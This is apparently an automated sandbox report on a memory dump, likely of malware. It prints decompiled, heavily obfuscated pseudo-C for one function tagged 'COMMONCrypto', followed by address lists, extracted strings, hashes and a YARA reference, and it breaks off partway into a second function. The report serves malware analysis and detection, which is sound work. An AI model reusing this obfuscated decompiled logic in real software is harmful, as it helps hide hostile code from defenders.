Uniqueness Score: -1.00%

Function 00BB996C, Relevance: 19.4, Strings: 15, Instructions: 674
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00BB996C(signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				signed int* _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* __ecx;
				signed int _t757;
				void* _t765;
				signed int _t769;
				signed int _t775;
				signed int _t786;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				void* _t805;
				signed int _t814;
				intOrPtr* _t823;
				void* _t874;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t895;
				signed int* _t902;
				void* _t904;

				_push(_a40);
				_push(_a36);
				_v4 = __edx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00BB8002(_a20 & 0x0000ffff);
				_v264 = 0xc60fd9;
				_v264 = _v264 >> 0xb;
				_t902 =  &(( &_v268)[0xc]);
				_v264 = _v264 ^ 0xb6865c26;
				_v264 = _v264 ^ 0xb68644e7;
				_t786 = 0;
				_v232 = 0x94febf;
				_t893 = 0x15b98a1;
				_v232 = _v232 << 0xd;
				_v232 = _v232 + 0xffff7487;
				_v232 = _v232 ^ 0x8b0095cf;
				_v232 = _v232 ^ 0x14d7c15b;
				_v132 = 0x739728;
				_v132 = _v132 + 0x181a;
				_v132 = _v132 + 0xffff9c9c;
				_v132 = _v132 ^ 0x00734b16;
				_v188 = 0x783031;
				_v188 = _v188 << 5;
				_v12 = 0;
				_t788 = 0x6e;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0x3918a120;
				_v148 = 0xdd82e;
				_v148 = _v148 | 0xe4e540fc;
				_v148 = _v148 + 0xc534;
				_v148 = _v148 ^ 0xe4eede32;
				_v116 = 0x899f5;
				_v116 = _v116 / _t788;
				_v116 = _v116 + 0x5648;
				_v116 = _v116 ^ 0x00406a4c;
				_v156 = 0x9ca5d6;
				_t789 = 0x1c;
				_t891 = 0x7b;
				_v156 = _v156 * 0x64;
				_v156 = _v156 << 9;
				_v156 = _v156 ^ 0x618b3000;
				_v32 = 0xd5cd6e;
				_v32 = _v32 / _t789;
				_v32 = _v32 ^ 0x0407a2c3;
				_v64 = 0x23343;
				_v64 = _v64 / _t891;
				_v64 = _v64 ^ 0x00080494;
				_v252 = 0xfa5485;
				_v252 = _v252 * 0x42;
				_v252 = _v252 | 0xc32886a6;
				_t790 = 0x50;
				_v252 = _v252 * 0x35;
				_v252 = _v252 ^ 0x8227d546;
				_v224 = 0x2e8bf6;
				_v224 = _v224 | 0xf76545cb;
				_v224 = _v224 / _t790;
				_v224 = _v224 << 6;
				_v224 = _v224 ^ 0xc5f30dc0;
				_v16 = 0x78ee4b;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0x80f1dc96;
				_v208 = 0x791fee;
				_v208 = _v208 >> 8;
				_v208 = _v208 >> 2;
				_v208 = _v208 >> 0xb;
				_v208 = _v208 ^ 0x00000003;
				_v152 = 0xbd5041;
				_t791 = 5;
				_v152 = _v152 / _t791;
				_v152 = _v152 + 0x721a;
				_v152 = _v152 ^ 0x00264eb2;
				_v136 = 0x6c2d31;
				_v136 = _v136 + 0xffff6aee;
				_v136 = _v136 ^ 0x21760cef;
				_v136 = _v136 ^ 0x211d94ef;
				_v120 = 0x6ceb08;
				_v120 = _v120 + 0xffffcbf6;
				_v120 = _v120 ^ 0x9f43d110;
				_v120 = _v120 ^ 0x9f2f67f1;
				_v88 = 0xc74391;
				_v88 = _v88 + 0xffff6c5e;
				_v88 = _v88 ^ 0x00c6afec;
				_v128 = 0x4b3465;
				_v128 = _v128 | 0xcf5ecbdf;
				_v128 = _v128 ^ 0xcf5ffeff;
				_v264 = 0xfd23b8;
				_t792 = 0x4e;
				_v264 = _v264 / _t792;
				_t793 = 0x45;
				_v264 = _v264 / _t793;
				_v264 = _v264 ^ 0x0002f78a;
				_v264 = 0xfa9619;
				_t794 = 0x1e;
				_v264 = _v264 / _t794;
				_v264 = _v264 + 0xffffb0fb;
				_v264 = _v264 ^ 0x000b775c;
				_v264 = 0x807ba4;
				_v264 = _v264 << 4;
				_v264 = _v264 << 0xa;
				_v264 = _v264 ^ 0x1ee80ab8;
				_v264 = 0x9af257;
				_v264 = _v264 << 0xb;
				_v264 = _v264 * 0x56;
				_v264 = _v264 ^ 0x6b422079;
				_v268 = 0x26ec4d;
				_v268 = _v268 << 0xc;
				_v268 = _v268 >> 0xe;
				_v268 = _v268 ^ 0xbf1cc723;
				_v268 = _v268 ^ 0xbf1316e8;
				_v268 = 0x604ef4;
				_v268 = _v268 | 0xbb4d6b52;
				_v268 = _v268 >> 5;
				_t795 = 0x18;
				_v268 = _v268 / _t795;
				_v268 = _v268 ^ 0x003fa9db;
				_v268 = 0xff1eaf;
				_v268 = _v268 << 8;
				_t796 = 0xa;
				_v268 = _v268 * 0x6c;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 ^ 0x000cb5e2;
				_v260 = 0xc7e312;
				_v260 = _v260 | 0x4ced50b1;
				_v260 = _v260 ^ 0x4ce89335;
				_v260 = 0xaa4ecb;
				_v260 = _v260 << 0x10;
				_v260 = _v260 ^ 0x4ec443b3;
				_v264 = 0x38c20f;
				_v264 = _v264 >> 9;
				_v264 = _v264 | 0x7754c32c;
				_v264 = _v264 ^ 0x775a6c62;
				_v268 = 0xc43478;
				_v268 = _v268 * 0x54;
				_v268 = _v268 ^ 0x37dd0540;
				_v268 = _v268 + 0x34a3;
				_v268 = _v268 ^ 0x77bf44fd;
				_v268 = 0x77fa17;
				_v268 = _v268 + 0xffffb1ac;
				_v268 = _v268 * 0x73;
				_v268 = _v268 << 5;
				_v268 = _v268 ^ 0xb8444167;
				_v172 = 0x123f2b;
				_v172 = _v172 ^ 0x6fe657fb;
				_v172 = _v172 + 0x9431;
				_v172 = _v172 ^ 0x6ff55f0d;
				_v240 = 0xf43856;
				_v240 = _v240 + 0xffff5dae;
				_v240 = _v240 + 0xffff503f;
				_v240 = _v240 >> 5;
				_v240 = _v240 ^ 0x000ec78e;
				_v80 = 0x77a9f7;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xdeafa158;
				_v248 = 0x33c41a;
				_v248 = _v248 + 0xffffb1d0;
				_v248 = _v248 * 0x66;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x01f08429;
				_v216 = 0x461c40;
				_v216 = _v216 * 0x16;
				_v216 = _v216 >> 0xb;
				_v216 = _v216 / _t796;
				_v216 = _v216 ^ 0x0005571e;
				_v164 = 0x51d98c;
				_v164 = _v164 | 0x3f5455a1;
				_v164 = _v164 * 0x74;
				_v164 = _v164 ^ 0xb2e52dfc;
				_v108 = 0x44745a;
				_t314 =  &_v108; // 0x44745a
				_v108 =  *_t314 * 0x63;
				_v108 = _v108 + 0xffff8cf2;
				_v108 = _v108 ^ 0x1a7ba94f;
				_v40 = 0xed32ff;
				_v40 = _v40 + 0x1ad9;
				_v40 = _v40 ^ 0x00e55aa4;
				_v196 = 0x47b3fb;
				_v196 = _v196 >> 0xe;
				_v196 = _v196 ^ 0xd9c7612f;
				_v196 = _v196 ^ 0xa0a00898;
				_v196 = _v196 ^ 0x7960f230;
				_v180 = 0x538ee1;
				_v180 = _v180 >> 6;
				_v180 = _v180 | 0xecdb2f6f;
				_v180 = _v180 ^ 0xecd76c94;
				_v104 = 0x633234;
				_v104 = _v104 ^ 0xd30b5520;
				_v104 = _v104 | 0xe2e43f1e;
				_v104 = _v104 ^ 0xf3ed65d6;
				_v212 = 0xf9c0f6;
				_v212 = _v212 + 0x2d4a;
				_t797 = 6;
				_v212 = _v212 * 0x4f;
				_v212 = _v212 + 0x46b3;
				_v212 = _v212 ^ 0x4d2b61f6;
				_v100 = 0xc841ec;
				_v100 = _v100 * 0x22;
				_v100 = _v100 ^ 0x1a9d1048;
				_v28 = 0x65babf;
				_v28 = _v28 + 0xffff8486;
				_v28 = _v28 ^ 0x006f3125;
				_v256 = 0xbe5bf2;
				_v256 = _v256 + 0xc39e;
				_v256 = _v256 * 0xc;
				_v256 = _v256 / _t797;
				_v256 = _v256 ^ 0x01787995;
				_v72 = 0xd91fd7;
				_v72 = _v72 + 0x652d;
				_v72 = _v72 ^ 0x00d4f002;
				_v96 = 0xd13a07;
				_t798 = 0x60;
				_v96 = _v96 / _t798;
				_v96 = _v96 ^ 0x000707c2;
				_v20 = 0xffc8b7;
				_v20 = _v20 ^ 0x1e1e598a;
				_v20 = _v20 ^ 0x1ee18fe4;
				_v176 = 0xcdab5;
				_v176 = _v176 ^ 0x9598c7bd;
				_v176 = _v176 + 0xffff92b0;
				_v176 = _v176 ^ 0x959d0362;
				_v184 = 0xa758a4;
				_v184 = _v184 + 0x5903;
				_v184 = _v184 + 0xfffff609;
				_v184 = _v184 ^ 0x00ae750e;
				_v56 = 0xc83e02;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x0323bea3;
				_v76 = 0xad0f66;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x00063244;
				_v84 = 0x39efa1;
				_v84 = _v84 ^ 0xb68855ee;
				_v84 = _v84 ^ 0xb6b61069;
				_v92 = 0xe02175;
				_v92 = _v92 | 0xb2c815a7;
				_v92 = _v92 ^ 0xb2e41d90;
				_v236 = 0x4481b2;
				_v236 = _v236 + 0x743f;
				_v236 = _v236 * 0x2f;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x0006d55a;
				_v160 = 0xb9532c;
				_v160 = _v160 << 5;
				_v160 = _v160 * 0x49;
				_v160 = _v160 ^ 0x9b1801bc;
				_v244 = 0x1281ad;
				_v244 = _v244 + 0xa67d;
				_v244 = _v244 ^ 0x7c1b37b8;
				_v244 = _v244 + 0xffff20cb;
				_v244 = _v244 ^ 0x7c0b9163;
				_v192 = 0x88e24d;
				_v192 = _v192 ^ 0x2ebd1bb6;
				_v192 = _v192 / _t891;
				_v192 = _v192 ^ 0x006b6db3;
				_v68 = 0xd4274f;
				_t799 = 0x2e;
				_v68 = _v68 / _t799;
				_v68 = _v68 ^ 0x00048e69;
				_v144 = 0xb83dd4;
				_v144 = _v144 | 0xb8649d90;
				_v144 = _v144 + 0x9cab;
				_v144 = _v144 ^ 0xb8f32006;
				_v228 = 0x23b3be;
				_v228 = _v228 << 8;
				_v228 = _v228 + 0x2e9b;
				_v228 = _v228 + 0xffff8964;
				_v228 = _v228 ^ 0x23ba9bf9;
				_v264 = 0xe685de;
				_t800 = 0x37;
				_v264 = _v264 * 5;
				_v264 = _v264 << 3;
				_v264 = _v264 ^ 0x240c8630;
				_v44 = 0x14cbda;
				_v44 = _v44 + 0xffff3a4b;
				_v44 = _v44 ^ 0x0010602b;
				_v52 = 0x1a3334;
				_v52 = _v52 ^ 0x068d8d0f;
				_v52 = _v52 ^ 0x06918054;
				_v60 = 0xaf3d51;
				_v60 = _v60 + 0xffff6264;
				_v60 = _v60 ^ 0x00a9df53;
				_v200 = 0x71a8f9;
				_v200 = _v200 + 0x8847;
				_v200 = _v200 ^ 0x82b40171;
				_v200 = _v200 / _t800;
				_v200 = _v200 ^ 0x02617ea6;
				_v204 = 0x911bb9;
				_t801 = 0x35;
				_v204 = _v204 * 0x50;
				_v204 = _v204 + 0xffff59e3;
				_v204 = _v204 / _t801;
				_v204 = _v204 ^ 0x00d8a8d3;
				_v48 = 0x1e2b49;
				_v48 = _v48 + 0xffff0c75;
				_v48 = _v48 ^ 0x001a2795;
				_v168 = 0xc7820c;
				_t802 = 0x39;
				_v168 = _v168 / _t802;
				_v168 = _v168 + 0xffff4704;
				_v168 = _v168 ^ 0x0003986f;
				_v124 = 0x6bd51f;
				_v124 = _v124 << 0xc;
				_v124 = _v124 * 0x75;
				_v124 = _v124 ^ 0x8677d78d;
				_v112 = 0x5ede35;
				_v112 = _v112 << 0xe;
				_v112 = _v112 | 0xed99d87a;
				_v112 = _v112 ^ 0xff9c1971;
				_v140 = 0xd25fe4;
				_v140 = _v140 ^ 0x91b7fe4b;
				_t803 = 0x31;
				_v140 = _v140 * 0x59;
				_v140 = _v140 ^ 0x8c53baba;
				_v24 = 0x69dec7;
				_v24 = _v24 + 0xffff289d;
				_v24 = _v24 ^ 0x0068496e;
				_v268 = 0xfe2e0f;
				_v268 = _v268 + 0x26d8;
				_v268 = _v268 / _t803;
				_t804 = 0x1a;
				_v268 = _v268 / _t804;
				_v268 = _v268 ^ 0x000142e0;
				_v260 = 0xf9e36a;
				_v260 = _v260 | 0x3f41e488;
				_v260 = _v260 ^ 0x3ff084b0;
				_t900 = _v8;
				_t892 = _v8;
				while(1) {
					L1:
					_t757 = _v220;
					_t805 = 0x8b02343;
					while(1) {
						L2:
						_t874 = 0x1521ea4;
						while(1) {
							L3:
							_t904 = _t893 - 0x65b0c22;
							if(_t904 > 0) {
								goto L18;
							}
							L4:
							if(_t904 == 0) {
								E00BB7B46(_t757, _v140, _v24);
								_t893 = 0x2386dfb;
								while(1) {
									L1:
									_t757 = _v220;
									_t805 = 0x8b02343;
									goto L2;
								}
							} else {
								if(_t893 == _t874) {
									_t757 = E00BBF984(_v196, _t900, _t805, _t805, _v180, _t805, _v104, _a40, _t805, _v88, _v212, _a20, _v100, _v28);
									_t902 =  &(_t902[0xc]);
									_v220 = _t757;
									__eflags = _t757;
									_t805 = 0x8b02343;
									_t893 =  !=  ? 0x8b02343 : 0x2386dfb;
									goto L2;
								} else {
									if(_t893 == 0x15b98a1) {
										_t893 = 0x9ed2ff1;
										continue;
									} else {
										if(_t893 == 0x2386dfb) {
											E00BB7B46(_t900, _v268, _v260);
										} else {
											if(_t893 == 0x4000434) {
												E00BB7B46(_t892, _v124, _v112);
												_t893 = 0x65b0c22;
												while(1) {
													L1:
													_t757 = _v220;
													_t805 = 0x8b02343;
													goto L2;
												}
											} else {
												if(_t893 != 0x4250561) {
													L38:
													__eflags = _t893 - 0xc402532;
													if(_t893 != 0xc402532) {
														_t757 = _v220;
														continue;
													}
												} else {
													_t823 = _v4;
													if( *_t823 == 0) {
														_t769 = 0;
														__eflags = 0;
													} else {
														_t769 =  *((intOrPtr*)(_t823 + 4));
													}
													E00BCD4B7(_v200, _t892, _v204, _t823, _t769, _a8, _v48, _v168,  *_t823);
													_t902 =  &(_t902[7]);
													asm("sbb esi, esi");
													_t893 = (_t893 & 0x06f981ef) + 0x4000434;
													while(1) {
														L1:
														_t757 = _v220;
														_t805 = 0x8b02343;
														L2:
														_t874 = 0x1521ea4;
														while(1) {
															L3:
															_t904 = _t893 - 0x65b0c22;
															if(_t904 > 0) {
																goto L18;
															}
															goto L4;
														}
														goto L18;
													}
												}
											}
										}
									}
								}
							}
							L41:
							return _t786;
							L18:
							__eflags = _t893 - _t805;
							if(_t893 == _t805) {
								__eflags =  *_v4;
								if(__eflags == 0) {
									_t759 = _v12;
								} else {
									_push(0xbb1178);
									_v12 = E00BD0AD3(_v256, _v72, __eflags);
								}
								_t814 = _v16 | _v224 | _v252 | _v64 | _v32 | _v156 | _v116 | _v148 | _v188;
								_t895 = _a36 & 1;
								__eflags = _t895;
								if(_t895 != 0) {
									__eflags = _t814;
								}
								_t892 = E00BCE70C(_t814, 1, _v96, _v20, _t814, _v176, _t814, _v184, _v220, _t814, _v56, _a28, _t759);
								E00BC2EED(_v76, _v84, _v92, _v12);
								_t902 =  &(_t902[0xd]);
								__eflags = _t892;
								if(_t892 == 0) {
									_t893 = 0x65b0c22;
									goto L37;
								} else {
									_v36 = 1;
									E00BBD7E2(_t892,  &_v36, 4, _v236, _v152, _v160, _v244, _v192);
									_t902 =  &(_t902[6]);
									__eflags = _t895;
									if(_t895 != 0) {
										E00BC5F7D(_v68, _t892,  &_v8, _v136, _v144, _v228,  &_v36);
										_t684 =  &_v36;
										 *_t684 = _v36 | _v128;
										__eflags =  *_t684;
										E00BBD7E2(_t892,  &_v36, _v8, _v264, _v120, _v44, _v52, _v60);
										_t902 =  &(_t902[0xb]);
									}
									_t893 = 0x4250561;
									goto L1;
								}
							} else {
								__eflags = _t893 - 0x93954fc;
								if(_t893 == 0x93954fc) {
									__eflags = E00BC5B7C(_t892, _a16);
									_t893 = 0x4000434;
									_t765 = 1;
									_t786 =  !=  ? _t765 : _t786;
									while(1) {
										L1:
										_t757 = _v220;
										_t805 = 0x8b02343;
										goto L2;
									}
								} else {
									__eflags = _t893 - 0x9ed2ff1;
									if(_t893 == 0x9ed2ff1) {
										_t893 = 0xdffbe0d;
										continue;
									} else {
										__eflags = _t893 - 0xaf98623;
										if(__eflags == 0) {
											__eflags = E00BD314A(_t892, _v232, __eflags) - _v132;
											_t893 =  ==  ? 0x93954fc : 0x4000434;
											while(1) {
												L1:
												_t757 = _v220;
												_t805 = 0x8b02343;
												goto L2;
											}
										} else {
											__eflags = _t893 - 0xdffbe0d;
											if(_t893 == 0xdffbe0d) {
												_push(_t805);
												_t775 = E00BC02E9(_v172, _v240, _v80, _t805, _t805, _v208, _t805, _v248);
												_t900 = _t775;
												__eflags = _t775;
												_t893 =  !=  ? 0x1521ea4 : 0xc402532;
												E00BBF699(_v216, 0, _v164, _v108, _v40);
												_t902 =  &(_t902[0xa]);
												L37:
												_t874 = 0x1521ea4;
												_t805 = 0x8b02343;
											}
											goto L38;
										}
									}
								}
							}
							goto L41;
						}
					}
				}
			}

0x00bb997d
0x00bb9987
0x00bb998e
0x00bb9995
0x00bb999c
0x00bb99a3
0x00bb99aa
0x00bb99ab
0x00bb99b2
0x00bb99b9
0x00bb99c0
0x00bb99c7
0x00bb99c9
0x00bb99ce
0x00bb99d8
0x00bb99dd
0x00bb99e0
0x00bb99ea
0x00bb99f2
0x00bb99f4
0x00bb99fc
0x00bb9a01
0x00bb9a06
0x00bb9a0e
0x00bb9a16
0x00bb9a1e
0x00bb9a29
0x00bb9a34
0x00bb9a3f
0x00bb9a4a
0x00bb9a52
0x00bb9a57
0x00bb9a65
0x00bb9a68
0x00bb9a6c
0x00bb9a74
0x00bb9a7f
0x00bb9a8a
0x00bb9a95
0x00bb9aa0
0x00bb9ab6
0x00bb9abd
0x00bb9ac8
0x00bb9ad3
0x00bb9ae6
0x00bb9ae9
0x00bb9aea
0x00bb9af1
0x00bb9af9
0x00bb9b04
0x00bb9b1a
0x00bb9b21
0x00bb9b2c
0x00bb9b40
0x00bb9b47
0x00bb9b52
0x00bb9b5f
0x00bb9b63
0x00bb9b74
0x00bb9b77
0x00bb9b7b
0x00bb9b83
0x00bb9b8b
0x00bb9b9b
0x00bb9b9f
0x00bb9ba4
0x00bb9bac
0x00bb9bb7
0x00bb9bbe
0x00bb9bc9
0x00bb9bd1
0x00bb9bd6
0x00bb9bdb
0x00bb9be0
0x00bb9be5
0x00bb9bf7
0x00bb9bfc
0x00bb9c05
0x00bb9c10
0x00bb9c1b
0x00bb9c26
0x00bb9c31
0x00bb9c3c
0x00bb9c47
0x00bb9c52
0x00bb9c5d
0x00bb9c68
0x00bb9c73
0x00bb9c7e
0x00bb9c89
0x00bb9c94
0x00bb9c9f
0x00bb9caa
0x00bb9cb5
0x00bb9cc1
0x00bb9cc6
0x00bb9cd0
0x00bb9cd5
0x00bb9cdb
0x00bb9ce3
0x00bb9cef
0x00bb9cf2
0x00bb9cf6
0x00bb9cfe
0x00bb9d06
0x00bb9d0e
0x00bb9d13
0x00bb9d18
0x00bb9d20
0x00bb9d28
0x00bb9d32
0x00bb9d36
0x00bb9d3e
0x00bb9d46
0x00bb9d4b
0x00bb9d50
0x00bb9d58
0x00bb9d60
0x00bb9d6a
0x00bb9d72
0x00bb9d7d
0x00bb9d82
0x00bb9d88
0x00bb9d90
0x00bb9d98
0x00bb9da2
0x00bb9da3
0x00bb9da7
0x00bb9dac
0x00bb9db4
0x00bb9dbc
0x00bb9dc4
0x00bb9dcc
0x00bb9dd4
0x00bb9dd9
0x00bb9de1
0x00bb9de9
0x00bb9dee
0x00bb9df6
0x00bb9dfe
0x00bb9e0b
0x00bb9e0f
0x00bb9e17
0x00bb9e1f
0x00bb9e27
0x00bb9e2f
0x00bb9e3c
0x00bb9e40
0x00bb9e45
0x00bb9e4d
0x00bb9e55
0x00bb9e5d
0x00bb9e65
0x00bb9e6d
0x00bb9e75
0x00bb9e7d
0x00bb9e85
0x00bb9e8a
0x00bb9e92
0x00bb9e9d
0x00bb9ea5
0x00bb9eb0
0x00bb9eb8
0x00bb9ec5
0x00bb9ec9
0x00bb9ece
0x00bb9ed6
0x00bb9ee3
0x00bb9ee7
0x00bb9ef2
0x00bb9ef6
0x00bb9efe
0x00bb9f06
0x00bb9f13
0x00bb9f17
0x00bb9f1f
0x00bb9f2a
0x00bb9f32
0x00bb9f39
0x00bb9f44
0x00bb9f4f
0x00bb9f5a
0x00bb9f65
0x00bb9f70
0x00bb9f78
0x00bb9f7f
0x00bb9f87
0x00bb9f8f
0x00bb9f97
0x00bb9f9f
0x00bb9fa4
0x00bb9fac
0x00bb9fb4
0x00bb9fbf
0x00bb9fca
0x00bb9fd5
0x00bb9fe0
0x00bb9fe8
0x00bb9ff7
0x00bb9ffa
0x00bb9ffe
0x00bba006
0x00bba00e
0x00bba021
0x00bba028
0x00bba033
0x00bba03e
0x00bba049
0x00bba054
0x00bba05c
0x00bba069
0x00bba075
0x00bba079
0x00bba081
0x00bba08c
0x00bba097
0x00bba0a2
0x00bba0b4
0x00bba0b7
0x00bba0be
0x00bba0c9
0x00bba0d4
0x00bba0df
0x00bba0ea
0x00bba0f2
0x00bba0fa
0x00bba102
0x00bba10a
0x00bba112
0x00bba11a
0x00bba122
0x00bba12a
0x00bba135
0x00bba13d
0x00bba148
0x00bba153
0x00bba15b
0x00bba166
0x00bba171
0x00bba17c
0x00bba187
0x00bba192
0x00bba19d
0x00bba1a8
0x00bba1b0
0x00bba1bd
0x00bba1c1
0x00bba1c6
0x00bba1ce
0x00bba1d6
0x00bba1e0
0x00bba1e4
0x00bba1ec
0x00bba1f6
0x00bba1fe
0x00bba206
0x00bba20e
0x00bba216
0x00bba21e
0x00bba22e
0x00bba234
0x00bba23c
0x00bba24e
0x00bba253
0x00bba25c
0x00bba267
0x00bba272
0x00bba27d
0x00bba288
0x00bba293
0x00bba29b
0x00bba2a0
0x00bba2a8
0x00bba2b0
0x00bba2b8
0x00bba2c5
0x00bba2c8
0x00bba2cc
0x00bba2d1
0x00bba2d9
0x00bba2e4
0x00bba2ef
0x00bba2fa
0x00bba305
0x00bba310
0x00bba31b
0x00bba326
0x00bba331
0x00bba33c
0x00bba344
0x00bba34c
0x00bba35c
0x00bba360
0x00bba368
0x00bba375
0x00bba378
0x00bba37c
0x00bba38c
0x00bba390
0x00bba398
0x00bba3a3
0x00bba3ae
0x00bba3b9
0x00bba3c5
0x00bba3c8
0x00bba3cc
0x00bba3d4
0x00bba3dc
0x00bba3e7
0x00bba3f7
0x00bba3fe
0x00bba409
0x00bba416
0x00bba41e
0x00bba429
0x00bba434
0x00bba43f
0x00bba454
0x00bba457
0x00bba45e
0x00bba469
0x00bba474
0x00bba47f
0x00bba48a
0x00bba492
0x00bba4a2
0x00bba4aa
0x00bba4ad
0x00bba4b1
0x00bba4b9
0x00bba4c1
0x00bba4c9
0x00bba4d1
0x00bba4d8
0x00bba4df
0x00bba4df
0x00bba4df
0x00bba4e3
0x00bba4e8
0x00bba4e8
0x00bba4e8
0x00bba4ed
0x00bba4ed
0x00bba4ed
0x00bba4f3
0x00000000
0x00000000
0x00bba4f9
0x00bba4f9
0x00bba61f
0x00bba625
0x00bba4df
0x00bba4df
0x00bba4df
0x00bba4e3
0x00000000
0x00bba4e3
0x00bba4ff
0x00bba501
0x00bba5ef
0x00bba5f4
0x00bba5f7
0x00bba5fb
0x00bba602
0x00bba607
0x00000000
0x00bba507
0x00bba50d
0x00bba5a3
0x00000000
0x00bba513
0x00bba519
0x00bba8d5
0x00bba51f
0x00bba525
0x00bba593
0x00bba599
0x00bba4df
0x00bba4df
0x00bba4df
0x00bba4e3
0x00000000
0x00bba4e3
0x00bba527
0x00bba52d
0x00bba8ba
0x00bba8ba
0x00bba8c0
0x00bba8c2
0x00000000
0x00bba8c2
0x00bba533
0x00bba533
0x00bba53d
0x00bba544
0x00bba544
0x00bba53f
0x00bba53f
0x00bba53f
0x00bba566
0x00bba56b
0x00bba570
0x00bba578
0x00bba4df
0x00bba4df
0x00bba4df
0x00bba4e3
0x00bba4e8
0x00bba4e8
0x00bba4ed
0x00bba4ed
0x00bba4ed
0x00bba4f3
0x00000000
0x00000000
0x00000000
0x00bba4f3
0x00000000
0x00bba4ed
0x00bba4df
0x00bba52d
0x00bba525
0x00bba519
0x00bba50d
0x00bba501
0x00bba8de
0x00bba8e7
0x00bba62f
0x00bba62f
0x00bba631
0x00bba718
0x00bba71b
0x00bba73c
0x00bba71d
0x00bba728
0x00bba733
0x00bba733
0x00bba77f
0x00bba783
0x00bba783
0x00bba785
0x00bba787
0x00bba787
0x00bba7c1
0x00bba7e0
0x00bba7e5
0x00bba7e8
0x00bba7ea
0x00bba8ab
0x00000000
0x00bba7f0
0x00bba80b
0x00bba81f
0x00bba824
0x00bba827
0x00bba829
0x00bba856
0x00bba870
0x00bba870
0x00bba870
0x00bba899
0x00bba89e
0x00bba89e
0x00bba8a1
0x00000000
0x00bba8a1
0x00bba637
0x00bba637
0x00bba63d
0x00bba6ff
0x00bba701
0x00bba708
0x00bba709
0x00bba4df
0x00bba4df
0x00bba4df
0x00bba4e3
0x00000000
0x00bba4e3
0x00bba643
0x00bba643
0x00bba649
0x00bba6e7
0x00000000
0x00bba64f
0x00bba64f
0x00bba655
0x00bba6d8
0x00bba6df
0x00bba4df
0x00bba4df
0x00bba4df
0x00bba4e3
0x00000000
0x00bba4e3
0x00bba657
0x00bba657
0x00bba65d
0x00bba663
0x00bba681
0x00bba68d
0x00bba69b
0x00bba6ad
0x00bba6b2
0x00bba6b7
0x00bba8b0
0x00bba8b0
0x00bba8b5
0x00bba8b5
0x00000000
0x00bba65d
0x00bba655
0x00bba649
0x00bba63d
0x00000000
0x00bba631
0x00bba4ed
0x00bba4e8

Strings

1-l, xrefs: 00BB9C1B
u!, xrefs: 00BBA187
M&, xrefs: 00BB9D3E
10x, xrefs: 00BB9A4A
ZtD, xrefs: 00BB9F2A
Kx, xrefs: 00BB9BAC
-e, xrefs: 00BBA08C
%1o, xrefs: 00BBA049
blZw, xrefs: 00BB9DF6
Lj@, xrefs: 00BB9AC8
e4K, xrefs: 00BB9C94
J-, xrefs: 00BB9FE8
?t, xrefs: 00BBA1B0
42c, xrefs: 00BB9FB4
nIh, xrefs: 00BBA47F

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %1o$-e$1-l$10x$42c$?t$J-$Kx$Lj@$M&$ZtD$blZw$e4K$nIh$u!
API String ID: 0-4213897193
Opcode ID: b97aab4770908091bd8bb8898ab8b920cc6ee0d1dde928897b86eb1aff12f899
Instruction ID: 69d300ff88ec3b1ad6e3d35e7107c2d32b69ecabf6d2e9cf341a6c9965a732bd
Opcode Fuzzy Hash: b97aab4770908091bd8bb8898ab8b920cc6ee0d1dde928897b86eb1aff12f899
Instruction Fuzzy Hash: AC72EF719083818FD378CF25C54AA9BBBE2FBD4704F10891DE5DA96260D7B18949CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6BFE, Relevance: 18.0, Strings: 14, Instructions: 484
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00BB6BFE(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
